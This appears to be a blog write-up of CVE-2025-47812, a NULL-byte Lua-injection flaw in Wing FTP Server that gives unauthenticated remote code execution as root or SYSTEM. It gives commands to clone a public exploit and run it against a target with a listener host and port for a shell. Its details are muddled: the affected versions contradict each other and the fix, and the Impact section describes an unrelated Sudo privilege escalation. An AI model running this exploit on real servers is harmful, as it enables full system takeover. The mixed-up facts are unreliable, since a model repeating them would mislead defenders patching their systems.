CVE-2025-47812

Published: 08 June 2025 • Tags: CVE, Wing FTP, Linux, Exploit Development

🔎 Overview: A critical vulnerability on WingFTP version <= 7.4.4 (CVE-2025-47812) allows attacker to inject lua code to the session which led to RCE when the sesssion lead the lua code.

🧠 Summary:

CVE ID: CVE-2025-47812
CVSS vector: 3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Software: <= 7.4.3
Impact: Remote Code Execution led to Full system compromise.

RCE Security's Julien Ahrens found a serious security flaw affecting WingFTP. The vulnerability, identified as CVE-2025-47812, has a CVSS score of 10. If the vulnerability is successfully exploited, a remote, unauthenticated attacker could be able to run arbitrary code and compromise the entire system. Wing FTP Server is a secure, user-friendly, and cross-platform FTP server program. It provides versatility for client connections by supporting a number of file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP.

🧪 About the vulnerability:

When a user try to login it calls the c_CheckUser call which always returns OK_CHECK_CONNECTION regardless of what comes after the NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker may exploit the vulnerability by adding a NULL byte and extra values to a known username to bypass the password check. The system uses strlen() on our username to get the string size, but strlen only counts all the characters until it reaches the NULL-byte terminator to match the unsanitized username. The unsanitized username (including the injected NULL and brainy payload) is stored directly into session files as Lua code.

These session files resemble .lua and are later executed when sessions are loaded. On Linux, Wing FTP server runs as root; on Windows, it runs as SYSTEM. The injected Lua payload runs with full privileges upon session reload. Note : This behaviour is only happening if the password is not set or with a valid credentials. It enforcing some strict password validation if password is set for the user.<< /p>

🚀 Exploitation:

Download the exploit

git clone https://github.com/pevinkumar10/CVE-2025-47812.git
 cd CVE-2025-47812

Run exploit:

python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336

🧨 PoC (Proof of Concept):

💥 Impact:

Any local user on a system running a vulnerable Sudo version (1.9.14 - 1.9.17) can gain root access without needing any sudoers rule. This affects default Sudo configurations.

🛡️ Mitigation:

Upgrade to WingFTP version 7.4.4 to patch the vulnerability.
More detail checkout here